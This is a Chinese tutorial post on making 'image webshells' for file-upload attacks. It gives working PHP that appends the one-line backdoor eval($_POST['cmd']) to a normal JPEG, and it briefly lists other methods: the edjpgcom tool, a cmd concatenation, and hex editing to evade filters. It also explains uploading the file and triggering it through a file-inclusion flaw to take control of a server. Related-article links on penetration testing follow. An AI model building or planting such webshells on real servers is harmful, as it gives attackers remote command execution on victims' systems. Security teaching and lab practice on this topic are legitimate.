文件上传漏洞(六)一句话马图片

简介: 文件上传漏洞(六)一句话马图片

image.png

 

制作马图

方式一

一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。

下面是一个生成一句话mu马图片的示例代码:

<?php
$code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码
$filename = 'shell.php'; // 生成的马文件名
$image = 'pic.jpg'; // 正常的图片文件名
$webshell = 'webshell.jpg'; // 生成的一句话马图片文件名

// 生成一句话马文件
file_put_contents($filename, $code);

// 将一句话mu马文件和正常的图片文件合并成一张图片马
$data = file_get_contents($image);
$data .= file_get_contents($filename);
file_put_contents($webshell, $data);

// 删除一句话马文件
unlink($filename);

该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。

方式二

利用脚本edjpgcom

将图片投入到edjpgcom脚本,然后写入一句话马

方式三

利用cmd命令

image.png

方式四

利用16进制编写一句话,有更好的绕过安全过滤

image.png


相关文章
|
Shell 网络安全
[网络安全]upload-labs Pass-13 解题详析
[网络安全]upload-labs Pass-13 解题详析
520 0
|
8月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
2241 1
Web渗透-文件上传漏洞-上篇
|
8月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
2504 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
SQL 安全 关系型数据库
SQL注入之万能密码:原理、实践与防御全解析
本文深入解析了“万能密码”攻击的运行机制及其危险性,通过实例展示了SQL注入的基本原理与变种形式。文章还提供了企业级防御方案,包括参数化查询、输入验证、权限控制及WAF规则配置等深度防御策略。同时,探讨了二阶注入和布尔盲注等新型攻击方式,并给出开发者自查清单。最后强调安全防护需持续改进,无绝对安全,建议使用成熟ORM框架并定期审计。技术内容仅供学习参考,严禁非法用途。
1844 0
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
1973 5
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
11296 2
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
12799 1
|
安全 测试技术 数据库
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
|
SQL 安全 数据处理
Web 测试神器:HackBar 保姆级教程
Web 测试神器:HackBar 保姆级教程